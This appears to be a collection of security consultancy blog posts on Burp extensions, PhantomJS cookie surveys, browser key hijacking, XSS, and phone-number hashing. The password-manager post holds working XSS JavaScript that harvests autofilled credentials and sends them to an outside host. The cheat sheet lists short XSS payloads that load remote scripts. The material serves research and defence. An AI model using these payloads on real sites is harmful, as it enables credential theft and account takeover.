Burp Extensions in Python & Pentesting Custom Web Services

A lot of my work lately has involved assessing web services; some are relatively straightforward REST and SOAP type services, but some of the most interesting and challenging involve varying degrees of additional requirements on top of a vanilla protocol, or entirely proprietary text-based protocols on top of HTTP. Almost without fail, the services require some extra twist in order to interact with them; specially crafted headers, message signing (such as HMAC or AES), message IDs or timestamps, or custom nonces with each request.

These kinds of unusual, one-off requirements can really take a chunk out of assessment time. Either the assessor spends a lot of time manually crafting or tampering with requests using existing tools, or spends a lot of time implementing and debugging code to talk to the service, then largely throws it away after the assessment. Neither is a very good use of time.

Ideally, we’d like to write the least amount of new code in order to get our existing tools to work with the new service. This is where writing extensions to our preferred tools becomes massively helpful: a very small amount of our own code handles the unusual aspects of the service, and then we’re able to take advantage of all the nice features of the tools we’re used to as well as work almost as quickly as we would on a service that didn’t have the extra proprietary twists.

Getting Started With Burp Extensions

Burp is the de facto standard for professional web app assessments and with the new extension API (released December 2012 in r1.5.01) a lot of complexity in creating Burp extensions went away. Before that the official API was quite limited and several different extension-building-extensions had stepped in to try to fill the gap (such as Hiccup, jython-burp-api, and Buby); each individually was useful, but collectively it all resulted in confusing and contradictory instructions to anyone getting started. Fortunately, the new extension API is good enough that developing directly against it (rather than some intermediate extension) is the way to go.

The official API supports Java, Python, and Ruby equally well. Given the choice I’ll take Python any day, so these instructions will be most applicable to the parseltongues.  Getting set up to use or develop extensions is reasonably straightforward (the official Burp instructions do a pretty good job), but there are a few gotchas I’ll try to point out along the way.

  1. Make sure you have a recent version of Burp (at least 1.5.01, but preferably 1.5.04 or later, where some of the early bugs were worked out of the extensions support) and a recent version of Java.
  2. Download the latest Jython standalone jar. The filename will be something like “jython-standalone-2.7-b1.jar”. (Even though the 2.7 branch is in beta, I found it plenty stable for my use; make sure to get it so that you can use Python 2.7 features in your extensions.)
  3. In Burp, switch to the Extender tab, then the Options sub-tab. Now, configure the location of the Jython jar.
  4. Burp indicates that it’s optional, but go ahead and set the “Folder for loading modules” to your Python site-packages directory; that way you’ll be able to make use of any system-wide modules in any of your custom extensions (requests, passlib, etc.). (NOTE: Some Burp extensions expect that this path will be set to their own module directory. If you encounter errors like “ImportError: No module named Foo”, simply change the folder for loading modules to point to wherever those modules exist for the extension.)
  5. The official Burp docs include one other important step:

    Note: Because of the way in which Jython and JRuby dynamically generate Java classes, you may encounter memory problems if you load several different Python or Ruby extensions, or if you unload and reload an extension multiple times. If this happens, you will see an error like:

    java.lang.OutOfMemoryError: PermGen space

    You can avoid this problem by configuring Java to allocate more PermGen storage, by adding a -XX:MaxPermSize option to the command line when starting Burp. For example:

    java -XX:MaxPermSize=1G -jar burp.jar

  6. At this point the environment is configured; now it’s time to load an extension. The default extension in the official Burp example does nothing (it defines just enough of the interface to load successfully), so we’ll go one step further. Since several of our assessments lately have involved adding some custom header or POST body element (usually for authentication or signing), that seems like a useful direction for a “Hello World”. Here is a simple extension that inserts data (in this case, a timestamp) as a new header field and at the end of the body. Save it somewhere on disk.
    # These are java classes, being imported using python syntax (Jython magic)
    from burp import IBurpExtender
    from burp import IHttpListener
    
    # These are plain old python modules, from the standard library
    # (or from the "Folder for loading modules" in Burp>Extender>Options)
    from datetime import datetime
    
    class BurpExtender(IBurpExtender, IHttpListener):
    
        def registerExtenderCallbacks(self, callbacks):
            self._callbacks = callbacks
            self._helpers = callbacks.getHelpers()
            callbacks.setExtensionName("Burp Plugin Python Demo")
            callbacks.registerHttpListener(self)
            return
    
        def processHttpMessage(self, toolFlag, messageIsRequest, currentRequest):
            # only process requests
            if not messageIsRequest:
                return
            
            requestInfo = self._helpers.analyzeRequest(currentRequest)
            timestamp = datetime.now()
            print "Intercepting message at:", timestamp.isoformat()
            
            headers = requestInfo.getHeaders()
            newHeaders = list(headers) #it's a Java arraylist; get a python list
            newHeaders.append("Timestamp: " + timestamp.isoformat())
            
            bodyBytes = currentRequest.getRequest()[requestInfo.getBodyOffset():]
            bodyStr = self._helpers.bytesToString(bodyBytes)
            newMsgBody = bodyStr + timestamp.isoformat()
            newMessage = self._helpers.buildHttpMessage(newHeaders, newMsgBody)
            
            print "Sending modified message:"
            print "----------------------------------------------"
            print self._helpers.bytesToString(newMessage)
            print "----------------------------------------------\n\n"
            
            currentRequest.setRequest(newMessage)
            return
    
  7. To load it into Burp, open the Extender tab, then the Extensions sub-tab. Click “Add”, and then provide the path to where you downloaded it.
  8. Test it out! Any requests sent from Burp (including Repeater, Intruder, etc) will be modified by the extension. Output is directed to the tabs in the Extender>Extensions view.

A request has been processed and modified by the extension (timestamps added to the header and body of the request). Since Burp doesn’t currently have any way to display what a response looks like after it was edited by an extension, it usually makes sense to output the results to the extension’s tab.

This is a reasonable starting place for developing your own extensions. From here it should be easy to play around with modifying the requests however you like: add or remove headers, parse or modify XML or JSON in the body, etc.

It’s important to remember as you’re developing custom extensions that you’re writing against a Java API. Keep the official Burp API docs handy, and be aware of when you’re manipulating objects from the Java side using Python code. Java to Python coercions in Jython are pretty sensible, but occasionally you run into something unexpected. It sometimes helps to manually take just the member data you need from complex Java objects, rather than figuring out how to pass the whole thing around other python code.
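For instance, a small helper along these lines (a sketch; the helpers, requestInfo, and raw request arguments are assumed to be the same objects used in the demo extension above) copies just the pieces you need into plain Python types, so the rest of your code never has to care about the Java side:

def extract_request(helpers, requestInfo, rawRequest):
    """Pull plain Python values out of Burp's Java objects.

    helpers     -- the IExtensionHelpers from callbacks.getHelpers()
    requestInfo -- the IRequestInfo from helpers.analyzeRequest(...)
    rawRequest  -- the byte[] from currentRequest.getRequest()
    """
    headers = [str(h) for h in requestInfo.getHeaders()]  # java.util.List -> list of str
    body = helpers.bytesToString(rawRequest[requestInfo.getBodyOffset():])
    return headers, body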

To reload the code and try out changes, simply untick then re-tick the “Loaded” checkbox next to the name of the extension in the Extensions sub-tab (or CTRL-click).

Jython Interactive Console and Developing Custom Extensions

Between the statically-typed Java API and playing around with code in a regular interactive Python session, it’s pretty quick to get most of a custom extension hacked together. However, when something goes wrong, it can be very annoying to not be able to drop into an interactive session and manipulate the actual Burp objects that are causing your extension to bomb.

Fortunately, Marcin Wielgoszewski’s jython-burp-api includes an interactive Jython console injected into a Burp tab. While I don’t recommend developing new extensions against the unofficial extension-hosting-extensions that were around before the official Burp API (in 1.5.01), access to the Jython tab is a pretty killer feature that stands well on its own.

You can install the jython-burp-api just as with the demo extension in step 6 above. The extension assumes that the “Folder for loading modules” (from step 4 above) is set to its own Lib/ directory. If you get errors such as “ImportError: No module named gds“, then either temporarily change your module folder, or use the solution noted here to have the extension fix up its own path.
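If you’d rather not keep switching the module folder back and forth, one common workaround (a sketch of the general approach, not necessarily the exact fix linked above) is to have the extension append its own Lib/ directory to sys.path before any gds imports run:

import os
import sys

# Hypothetical location; point this at the jython-burp-api Lib/ directory.
# __file__ is not guaranteed to be set in every Jython/Burp setup, so a
# hard-coded absolute path also works.
LIB_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)), "Lib")

if LIB_DIR not in sys.path:
    sys.path.append(LIB_DIR)  # "from gds import ..." should now resolve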

Once that’s working, it will add an interactive Jython shell tab into the Burp interface.


This shell was originally intended to work with the classes and objects defined in jython-burp-api, but it’s possible to pull back the curtain and get access to the exact same Burp API that you’re developing against in standalone extensions.

Within the pre-defined “Burp” object is a reference to the Callbacks object passed to every extension. From there, you can manually call any of the methods available to an extension. During development and testing of your own extensions, it can be very useful to manually try out code on a particular request (which you can access from the history via getProxyHistory()). Once you figure out what works, that code can go into your extension.
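For example, something like the following, typed into the Jython tab, grabs the most recent proxied request and analyzes it. getProxyHistory(), getHelpers(), and analyzeRequest() are standard Burp API calls; the attribute that exposes the callbacks reference on the Burp object is an assumption here, so check dir(Burp) for the real name in your version:

# "Burp" is the object pre-defined by jython-burp-api in the console tab.
# We assume the IBurpExtenderCallbacks reference is exposed as Burp.callbacks;
# use dir(Burp) to confirm.
callbacks = Burp.callbacks
helpers = callbacks.getHelpers()

history = callbacks.getProxyHistory()      # array of IHttpRequestResponse objects
latest = history[len(history) - 1]         # most recent proxied item

info = helpers.analyzeRequest(latest)      # returns an IRequestInfo
print info.getUrl()
print list(info.getHeaders())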


Objects from the official Burp Java API can be identified by their lack of help() strings and the obfuscated type names, but python-style exploratory programming still works as expected: the dir() function lists available fields and methods, which correspond to the Burp Java API.

Testing Web Services With Burp and SoapUI

When assessing custom web services, what we often get from customers is simply a spec document, maybe with a few concrete examples peppered throughout; actual working sample code, or real proxy logs are a rare luxury. In these cases, it becomes useful to have an interface that will be able to help craft and replay messages, and easily support variations of the same message (“Message A (as documented in spec)”, “Message A (actually working)”, “testing injections into field x”, “testing parameter overload of field y”, etc). While Burp is excellent at replaying and tampering with existing requests, the Burp interface doesn’t do a great job of helping to craft entirely new messages, or helping keep dozens of different variations organized and documented.

For this task, I turn to a tool familiar to many developers, but rather less known among pentesters: SoapUI. SoapUI calls itself the “swiss army knife of [web service] testing”, and it does a pretty good job of living up to that. By proxying it through Burp (File>Preferences>Proxy Settings) and using Burp extensions to programmatically deal with any additional logic required for the service, you can use the strengths of both and have an excellent environment for security testing against services. SoapUI Pro even includes a variety of web-service-specific payloads for security testing.


The main SoapUI interface, populated for penetration testing against a web service. Several variations of a particular service-specific POST message are shown, each demonstrating and providing easy reproducibility for a discovered vulnerability.

If the service offers a WSDL or WADL, configuring SoapUI to interact with it is straightforward; simply start a new project, paste in the URL of the endpoint, and hit okay. If the service is a REST service, or some other mechanism over HTTP, you can skip all of the validation checks and simply start manually creating requests by ticking the “Add REST Service” box in the “New SoapUI Project” dialog.


Create, manage, and send arbitrary HTTP requests without a “proper” WSDL or service description by telling SoapUI it’s a REST service.

In addition to helping you create and send requests, I find that the SoapUI project file is an invaluable resource for future assessments of the same service; any other tester can pick up right where I left off (even months or years later) by loading my Burp state and my SoapUI project file.

Share Back!

This should be enough to get you up and running with custom Burp extensions to handle unusual service logic, and SoapUI to craft and manage large numbers of example messages and payloads. For Burp, there are tons of extensions out there, including the official Burp examples, burpextensions.com, and many more findable on GitHub. Make sure to share other useful extensions, tools, or tricks in the comments, or hit me up to discuss: @coffeetocode or @neohapsis.

Collecting Cookies with PhantomJS

TL;DR: Automate WebKit with PhantomJS to get specific Web site data.

This is the first post in a series about gathering Web site reconnaissance with PhantomJS.

My first major engagement with Neohapsis involved compiling a Web site survey for a global legal services firm. The client was preparing for a compliance assessment against Article 29 of the EU Data Protection Directive, which details disclosure requirements for user privacy and usage of cookies. The scope of the engagement involved working with their provided list of IP addresses and domain names to validate their active and inactive Web sites and redirects, count how many first party and third party cookies each site placed, identify any login forms, and determine the presence of links to site privacy policy and cookie policy.

The list was extensive and the team had a hard deadline. We had a number of tools at our disposal to scrape Web sites, but as we had a specific set of attributes to look for, we determined that our best bet was to use a modern browser engine to capture fully rendered pages and try to automate the analysis. My colleague, Ben Toews, contributed a script towards this effort that used PhantomJS to visit a text file full of URLs and capture the cookies into another file. PhantomJS is a distribution of WebKit that is intended to run in a “headless” fashion, meaning that it renders Web pages and scripts like Apple Safari or Google Chrome, but without an interactive user interface. Instead, it runs on the command line and exposes a JavaScript API for scripting and command execution. I was able to build on this script to compile a list of active and inactive URLs by checking the status callback from page.open, and to capture the cookies from every active URL as stored in the page.cookies property.

Remember how I said that PhantomJS would render a Web page like Safari or Chrome? This was very important to the project, as I needed to capture the Web site attributes in the same way a typical user would encounter the site. We needed to account for redirects from either the Web server or from JavaScript, and any first or third party cookies along the way. As it turns out, PhantomJS provides a way to capture URL changes with the page.onUrlChanged callback function, which I used to log the redirects and final destination URL. The page.cookies attribute includes all first and third party cookies without any additional work, as PhantomJS makes all of the needed requests and script executions already. Check out my version of the script in chs2-basic.coffee.

This is the command invocation. It takes two arguments: a text file with one URL per line and a file name prefix for the output files.


phantomjs chs2-basic.coffee [in.txt] [prefix]

This snippet writes out the cookies into a JSON string and appends it to an output file.

if status is 'success'
  # output JSON of cookies from page, one JSON string per line
  # format: url:(requested URL from input) pageURL:(resolved Location from the PhantomJS "Address Bar") cookie: object containing cookies set on the page
  fs.write system.args[2] + ".jsoncookies", JSON.stringify({url:url,pageURL:page.url,cookie:page.cookies})+"\n", 'a'

In a followup post, I’ll discuss how to capture page headers and detect some common platform stacks.

Browser Event Hijacking

By: Ben Toews

TL;DR: preventDefault can be bad

In playing with the preventDefault method on JavaScript events, it occurred to me that one can easily hijack events that should get passed through to the browser. The example that I will be discussing here is the ctrl+f or ⌘+f combination. This ubiquitous key combination results in a search box of some type being displayed to the user. With browser and OS key bindings, there is a user expectation of continuity. We are conditioned as users to expect that pressing these key combinations will have a certain effect. The interruption of this continuity can have security implications.

In the example hosted here, a list of information that a user might be tempted to search through is presented. JavaScript on the page hijacks the ctrl+f and ⌘+f combinations, presenting a search box that is nearly identical to the browser search box users would see running Google Chrome on OS X. While JavaScript normally wouldn’t have access to the contents of the browser search box, the fake search box is obviously accessible to the malicious site.


Fake Browser Search Bar


Real Browser Search Bar (Google Chrome on OSX)

The ability of a malicious site to interrupt the expected continuity of user interaction with a web browser constitutes a breach of user trust on the part of the web browser. Because the user trusts that this key combination will trigger a browser event, they will trust the search bar presented by the site and interact with it as they would with the browser. Other key combinations could be similarly attacked. For example, ctrl+s/⌘+s or ctrl+o/⌘+o could be hijacked and could display a fake dialog claiming that the user’s password is required for file-system access. Specific attack scenarios aside, it is problematic to have ambiguity about the boundaries between browser and web app. More generally, a lower trust component should not have the ability to affect the behavior of a higher trust component.

This page probably won’t be convincing for users of different operating systems or browsers, but with a bit more effort, the script could detect the browser and OS and display an appropriate search box. It could also easily emulate other browser behavior, like highlighting entered text or scrolling around the page.

What is the solution, though? There are a few solutions that come to mind:

  1. Place the browser search box in a part of the browser that could not be confused with website content.
  2. Warn the user when a site attempts to call preventDefault on an event that is registered as a browser key binding.

I raised this issue to the Chrome team and it was labeled as a low-priority issue. I’m not sure that I disagree with that analysis, but I do think that this is an issue that should be considered.

Abusing Password Managers with XSS

By Ben Toews

One common and effective mitigation against Cross-Site Scripting (XSS) is to set the HTTPOnly flag on session cookies. This will generally prevent an attacker from stealing users’ session cookies with XSS. There are ways of circumventing this (e.g. the HTTP TRACE method), but generally speaking, it is fairly effective. That being said, an attacker can still cause significant damage without being able to steal the session cookie.

A variety of client-side attacks are possible, but an attacker is also often able to circumvent Cross-Site Request Forgery (CSRF) protections via XSS and thereby submit various forms within the application. The worst case scenario with this type of attack would be that there is no confirmation for email address or password changes and the attacker can change users’ passwords. From an attacker’s perspective this is valuable, but not as valuable as being able to steal a user’s session. By resetting the password, the attacker is giving away his presence, and the extent to which he is able to masquerade as another user is limited. While stealing the session cookie may be the most commonly cited method for hijacking user accounts, other means exist that do not involve changing user passwords.

All modern browsers come with some functionality to remember user passwords. Additionally, users will often install third-party applications to manage their passwords for them. All of these solutions save time for the user and generally help to prevent forgotten passwords. Third party password managers such as LastPass are also capable of generating strong, application specific passwords for users and then sending them off to the cloud for storage. Functionality such as this greatly improves the overall security of the username/password authentication model. By encouraging and facilitating the use of strong application specific passwords, users need not be as concerned with unreliable web applications that inadequately protect their data. For these and other reasons, password managers such as LastPass are generally considered within the security industry to be a good idea. I am a long time user of LastPass and have (almost) nothing but praise for their service.

An issue with both in-browser and third-party password managers that gets hardly any attention is how they can be abused by XSS. Because many of these password managers automatically fill login forms, an attacker can use JavaScript to read the contents of the form once it has been filled. The lack of attention this topic receives made me curious to see how exploitable it actually would be. For the purpose of testing, I built a simple PHP application with a functional login page as well as a second page that is vulnerable to XSS (find them here). I then proceeded to experiment with different JavaScript, attempting to steal user credentials with XSS from the following password managers:

  • LastPass (Current version as of April 2012)
  • Chrome (version 17)
  • Firefox (version 11)
  • Internet Explorer (version 9)

I first visited my login page and entered my password. If the password manager asked me if I wanted it to be remembered, I said yes. I then went to the XSS vulnerable page in my application and experimented with different JavaScript, attempting to access the credentials stored by the browser or password manager. I ended up writing some JavaScript that was effective against the password managers listed above with the exception of IE:

<script type="text/javascript">
    ex_username = '';
    ex_password = '';
    inter = '';
    function attack(){
        ex_username = document.getElementById('username').value;
        ex_password = document.getElementById('password').value;
        if(ex_username != '' || ex_password != ''){
            document.getElementById('xss').style.display = 'none'
            request=new XMLHttpRequest();
            url = "http://btoe.ws/pwxss?username="+ex_username+"&password="+ex_password;
            request.open("GET",url,true);
            request.send();
            document.getElementById('xss').style.visibility='hidden';
            window.clearInterval(inter);
        }
    }
    document.write("\
    <div id='xss'>\
    <form method='post' action='index.php'>\
    username:<input type='text' name='username' id='username' value='' autocomplete='on'>\
    password:<input type='password' name='password' id='password' value='' autocomplete='on'>\
    <input type='submit' name='login' value='Log In'>\
    </form>\
    </div>\
    ");
    inter = window.setInterval("attack()",100);
</script>

All that this code does is create a fake login form on the XSS-vulnerable page and then wait for it to be filled in by the browser or password manager. When the fields are filled, the JavaScript takes the values and sends them off to another server via a simple Ajax request. At first I had attempted to harness the onchange event of the form fields, but it turns out that this is unreliable across browsers (also, LastPass seems to mangle the form and input field DOM elements for whatever reason). Using window.setInterval, while less elegant, is more effective.

If you want to try out the above code, go to http://boomer.neohapsis.com/pwxss and log in (username: user1, password: secret). Then go to the reflections page and enter the slightly modified code listed there into the text box. If you told your password manager to remember the password for the site, you should see an alert box with the credentials you previously entered. Please let me know if you find any vulns aside from XSS in this app.

To be honest, I was rather surprised that my simple trick worked in Chrome and Firefox. The LastPass plugin in the Chrome browser operates on the DOM level like any other Chrome plugin, meaning that it can’t bypass event listeners that are watching for form submissions. The browsers, on the other hand, could put garbage into the form elements in the DOM and wait until after the onsubmit event has fired to put the real credentials into the form. This might break some web applications that take action based on the onchange event of the form inputs, but if that is a concern, I am sure that the browsers could somehow fill the form fields without triggering this event.

The reason why this code doesn’t work in IE (aside from the non-IE-friendly XHR request) is that the IE password manager doesn’t automatically fill in user credentials. IE also seems to be the only one of the bunch that ties a set of credentials to a specific page rather than to an entire domain. While these both may be inconveniences from a usability perspective, they (inadvertently or otherwise) improve the security of the password manager.

While this is an attack vector that doesn’t get much attention, I think that it should. XSS is a common problem, and developers get an unrealistic sense of security from the HTTPOnly cookie flag. This flag is largely effective in preventing session hijacking, but user credentials may still be at risk. While I didn’t get a chance to check them out when researching this, I would not be surprised if Opera and Safari had the same types of behavior.

I would be interested to hear a discussion of possible mitigations for this vulnerability. If you are a browser or browser-plugin developer or just an ordinary hacker, leave a comment and let me know what you think.

Edit: Prompted by some of the comments, I wrote a little script to demo how you could replace the whole document.body with that of the login page and use push state to trick a user into thinking that they were on the login page. https://gist.github.com/2552844

XSS Shortening Cheatsheet

By Ben Toews

In the course of a recent assessment of a web application, I ran into an interesting problem. I found XSS on a page, but the field was limited (yes, on the server side) to 20 characters. Of course I could demonstrate the problem to the client by injecting a simple <b>hello</b> into their page, but it leaves much more of an impression of severity when you can at least make an alert box.

My go-to line for testing XSS is always <script>alert(123123)</script>. It looks somewhat arbitrary, but I use it specifically because 123123 is easy to grep for and will rarely show up as a false positive (a quick Google search returns only 9 million pages containing the string 123123). It is also nice because it doesn’t require apostrophes.

This brings me to the problem. The above string is 30 characters long and I need to inject into a parameter that will only accept up to 20 characters. There are a few tricks for shortening your <script> tag, some more well known than others. Here are a few:

  • If you don’t specify a scheme section of the URL (http/https/whatever), the browser uses the current scheme. E.g. <script src='//btoe.ws/xss.js'></script>
  • If you don’t specify the host section of the URL, the browser uses the current host. This is only really valuable if  you can upload a malicious JavaScript file to the server you are trying to get XSS on. Eg. <script src='evil.js'></script>
  • If you are including a JavaScript file from another domain, there is no reason why its extension must be .js. Pro-tip: you could even have the malicious JavaScript file be set as the index on your server… Eg. <script src='http://btoe.ws'>
  • If you are using IE you don’t need to close the <script> tag (although I haven’t tested this in years and don’t have a Windows box handy). E.g. <script src='http://btoe.ws/evil.js'>
  • You don’t need quotes around your src attribute. Eg. <script src=http://btoe.ws/evil.js></script>

In the best case (your victim is running IE and you can upload arbitrary files to the web root), it seems that all you would need is <script src=/>. That’s pretty impressive, weighing in at only 14 characters. Then again, when will you actually get to use that in the wild or on an assessment? More likely is that you will have to host your malicious code on another domain. I own btoe.ws, which is short, but not quite as handy as some of the five-letter domain names. If you have one of those, the best you could do is <script src=ab.cd>. This is 18 characters and works in IE, but let’s assume that you want to be cross-platform and go with the 27 character option of <script src=ab.cd></script>. That’s still pretty short, but we are back over my 20 character limit.

Time to give up? I think not.

Another option is to forgo the <script> tag entirely. After all, ‘script’ is such a long word… There are many one letter HTML tags that accept event handlers. onclick and onkeyup are even pretty short. Here are a couple more tricks:

  • You can make up your own tags! E.g. <x onclick="alert(1)">foo</x>
  • If you don’t close your tag, some events will be inherited by the rest of the page following your injected code. E.g. <x onclick='alert(1)'>.
  • You don’t need to wrap your code in quotes. Eg. <b onclick=alert(1)>foo</b>
  • If the page already has some useful JavaScript (think JQuery) loaded, you can call their functions instead of your own. Eg. If they have a function defined as function a(){alert(1)} you can simply do <b onclick='a()'>foo</b>
  • While onclick and onkeyup are short when used with <b> or a custom tag, they aren’t going to fire without user interaction. The onload event of the <body> tag on the other hand will. I think that having duplicate <body> tags might not work on all browsers, though.  E.g. <body onload='alert(1)'>

Putting these tricks together, our optimal solution (assuming they have a one-letter function defined that does exactly what we want) gives us <b onclick=a()>. Similar to the unrealistically good <script> tag example from above, this comes in at just 15 characters. A more realistic and useful line might be <b onclick=alert(1)>. This comes in at exactly 20 characters, which is within my limit.

This worked for me, but maybe 20 characters is too long for you. If you really have to be a minimalist, injecting the <b> tag into the page is the smallest thing I can think of that will affect the page without raising too many errors. Slightly more minimalistic than that would be to simply inject <. This would likely break the page, but it would at least be noticeable and would prove your point.

This article is by no means intended to provide the answer, but rather to ask a question. I ask, or dare I say challenge, you to find a better solution than what I have shown above. It is also worth noting that I tested most of this on recent versions of Firefox and Chrome, but no other browsers. I am using a Linux box and don’t have access to much else at the moment. If you know that some of the above code does not work in other browsers, please comment below and I will make an edit, but please don’t tell me what does and does not work in lynx.

If you want to see some of these in action, copy the following into a file and open it in your browser, or go to http://mastahyeti.com/vps/shrtxss.html.

Edit: albinowax points out that onblur is shorter than onclick or onkeyup.


<html>
<head>
<title>xss example</title>
<script>
//my awesome js
function a(){alert(1)}
</script>
</head>
<body>

<!-- XSS Injected here -->
<x onclick=alert(1)>
<b onkeyup=alert(1)>
<x onclick=a()>
<b onkeyup=a()>
<body onload=a()>
<!-- End XSS Injection -->

<h1>XSS ROCKS</h1>
<p>click me</p>
<form>
<input value='try typing in here'>
</form>
</body>
</html>

PS: I did some Googling before writing this. Thanks to those at sla.ckers.org and at gnarlysec.

Pass the iOS Privacy Salt – Hashing Does NOT Guarantee Privacy.

By Kate Pearce, Neohapsis & Neolabs

There has been a lot of concern and online chatter about iPhone/mobile applications and the private data that some send to various parties. Starting with the discovery of Path sending your entire address book to their servers, it has since also been revealed that other applications do the same thing. The other offenders include Facebook, Twitter, Instagram, Foursquare, Foodspotting, Yelp, and Gowalla. This corresponds nicely with some research I have been doing into device ID leakage on mobile devices, where I have seen the same leakages, excuses, and techniques applied and abused as those discussed around the address book leakages.

I have observed a few posts discussing the issues and proposing solutions. These solutions range from requiring iOS to request permission for address book access (as it does for location) to advising developers to hash sensitive data that they send through and compare hashes server side.

The first idea is a very good one; I see few reasons a device’s geolocation is less sensitive than its address book. The second is only partial advice, however; if taken as it is given in Martin May’s post or Matt Gemmell’s arguments, it will not solve the privacy problems on its own. This is because 1. anonymised data isn’t anonymous, and 2. no matter what hashing algorithm you use, if the input material is sufficiently constrained you can compute, or precompute, all possible values.

Martin May’s two characteristics of a hash [link]:

  • Identical inputs will yield the same hash
  • It is virtually impossible to deduce the original input from a hash if a strong hashing algorithm is used.

This is because the privacy implications of the first characteristic are not fully discussed, and the second is incorrect as stated.

 Hashing will not solve the privacy concerns because:

  • Hashing Data does not Guarantee Privacy (When the same data is input)
  • Hashing Data does not Guarantee Secrecy (When the input values are constrained)

The reasons, which are not usually discussed, center on the fact that real-world input is constrained, not infinite. Telephone numbers are an extreme case of this, as I will discuss later.

A quick primer on hashing

Hashing is a destructive, theoretically one-way process where some data is taken and put through an algorithm to produce some output that is a shadow of the input. Like a shadow, the same output is always produced by the same input, but not the other way around. (Same car, same shadow).

A very simple example of a hashing function is the modulus (or remainder) operation. For instance, the output of 3 mod 2 is the remainder when 3 is divided by 2, or 1. The percent sign is commonly used in programming languages to denote this operation, so similarly:

1 % 3 is 1, 2 % 3 is 2, 3 % 3 is 0, 4 % 3 is 1, 5 % 3 is 2, etc.

If you take some input, you get the same output every time from the same hashing function. The reason the hashing process is one-way is that it intentionally discards some data about the original. This results in what are called collisions, and we can see some in our earlier example using mod 3: 1 and 4 give the same hash, as do 2 and 5. The toy example above collides constantly (there are only three possible outputs), but modern strong hashing functions are a great deal more complex than modulo 3. Even the “very broken” MD5 only produces collisions on the order of once in every 2^24 attempts (roughly 1 in 17,000,000) under its known attacks.

A key point is that, for any output of a hashing algorithm, there are theoretically an infinite number of inputs that can produce it, and thus it is a one-way, irreversible process.

A second key point is that any input gives the same output every time. So, by checking if the hashes of two items are the same you can be pretty sure they are from the same source material.
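Both points are easy to demonstrate with a few lines of Python (a toy illustration; the principle is the same for any strong hash):

import hashlib

def h(value):
    # SHA-256 of a string, returned as a hex digest
    return hashlib.sha256(value.encode("utf-8")).hexdigest()

print(h("+1 234 567 8910"))                           # same input...
print(h("+1 234 567 8910") == h("+1 234 567 8910"))   # ...always the same output (True)
print(h("+1 234 567 8911"))                           # a completely unrelated-looking output
# Nothing in either digest tells you, by inspection, which number produced it.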

Cooking Some Phone Number Hash(es)

(All calculations are approximate, if I’m not out by two orders of magnitude then…)

Phone numbers conform to a rather well known format, or set of formats. A modern GPU can run about 20 million hashes per second (2×10^7), or roughly 1.7 trillion (1.7×10^12) per day. So, how does this fit with possible phone numbers?

A pretty standard phone number is made up of 1-3 digits for a country code, 3 for the area code, and 7 digits, with perhaps 4 more for an extension.

So, we have the following range of numbers:

0000000000000-0000 to 9999999999999-0000

Or, 10^13 possible numbers… about six days’ work at the rate above to compute all possible values (and a LOT of storage space…)

If we now represent it in a few other forms that may occur to programmers…

+001 (234) 567-8910, 0012345678910, 001-234-5678910, 0012345678910(US), 001(234)5678910

We have maybe 10-20 times that, or a few months of calculations…

But, real-world phone numbers don’t fill all possible values. For instance, take a US phone number. It is also made up of the country code, 3 digits for the area code, and 7 digits, with perhaps 4 for the extension. But:

  • The country code is known
  • The area code is only about 35% used, since only around 350 values are in use
  • The 7 digit codes are not completely full (let’s guess 80%)
  • Most numbers do not use extensions (let’s say 5% use them)

Now, we only have 350 * (10,000,000 * 0.8) * 1.05, or 2.94 billion combinations (2.94×10^9). That is only a little over two minutes on a modern GPU. Even allowing for different representations of numbers, you could store that in a few gigabytes of RAM for instant lookup, or recalculate every time and take longer. This is what is called a time-space tradeoff: the space of the memory versus the time to recalculate.
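Here is a toy version of that time-space tradeoff in Python, scaled down to a single made-up area code and exchange so it runs in a moment; the full 2.94 billion-entry table is the same idea with bigger loops and a lot more memory:

import hashlib

def h(number):
    return hashlib.sha256(number.encode("utf-8")).hexdigest()

# Precompute hash -> number for one (hypothetical) area code and exchange.
# This assumes the app hashes numbers in exactly one canonical format.
table = {}
for n in range(10000):                      # last four digits only, for the demo
    number = "+1 (234) 567-%04d" % n
    table[h(number)] = number

# "Reversing" a leaked hash is now just a dictionary lookup.
leaked = h("+1 (234) 567-8910")
print(table.get(leaked))                    # -> +1 (234) 567-8910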

Anyway, the two takeaways for our discussion here regarding privacy are:

1. Every unique output value probably corresponds to a unique input value, so this hashing “anonymisation” still has privacy concerns.
Since the number of possible phone numbers is far smaller than the output space of even a broken hashing algorithm, there is little chance of collisions.

2. Phone numbers can be reverse computed from raw hashes alone.
Because of the known constraints on input values, it is possible either to brute-force reverse values or to build a reasonably sized rainbow table on a modern system.

Hashing Does NOT Guarantee Privacy

Anonymising data by removing specific user identifying information but leaving in unique identifiers does not work to assuage privacy concerns. This is because often clues are in the data, or in linkages between the data. AOL learned this the hard way when they released “anonymised” search data.

Furthermore, the network effect can reveal a lot about you: how many people you connect to, and how many they connect to, can be a powerful identifier of you, not to mention predict a lot of things like your career area and salary point (since more connections tend to mean richer).

For a good discussion of some of the privacy issues related to hashes see Matt Gemmell’s post, Hashing for Privacy in social apps.

Mobile apps also often send the device hardware identifier (which cannot be changed or removed) to servers and advertising networks, and I have also observed the hash of this (or of the WiFi MAC address) sent through. This hardly helps, as anyone who knows the device ID can hash it and look for that, and anyone who knows the hash can look for it, just as with the phone numbers. The hash is equally unique to my device, and equally unable to be changed.

Hashing Does not equal Secrecy

As discussed under “Cooking Some Phone Number Hash(es)”, it is possible to work back from a hash to the input, since we know some of the constraints operating upon phone numbers. Furthermore, even if we are not sure exactly how you are hashing data, we can simply put test data in and look for known hashes of it. If I know what 123456789 hashes to and I see that value in the output, then I know how your app is hashing phone numbers.

The Full Solution to Privacy and Secrecy: Salt

Both of these issues can be greatly helped by increasing the complexity of the input into the hash function. This can both remove the tendency for anonymised data to carry identical identifiers across instances, and also reduce the chance of it becoming feasible to reverse-calculate all possible values. Unfortunately there is no perfect solution to this if user-matching functionality comes first.

The correct solution as it should be used to store passwords, per-entry salting (for example with bcrypt), is not feasible for a matching algorithm: it will only work for comparing hashed input to stored hashes, and it will not work for comparing stored hashes to stored hashes.

However, if you as a developer are determined to make a server side matching service for your users, then you need to apply a hybrid approach. This is not good practice for highly sensitive information, but it should retain the functionality needed for server side matching.

Your first privacy step is to make sure your hashes do not match those collected or used by anyone else; do this by adding some constant secret to the input before hashing, a process called salting.

e.g., adding 9835476579080945368095468905486 to the start of every number before you hash

This will make all of your hashes different from those used by any other developer, but they will still compare properly: the same input will give the same output.

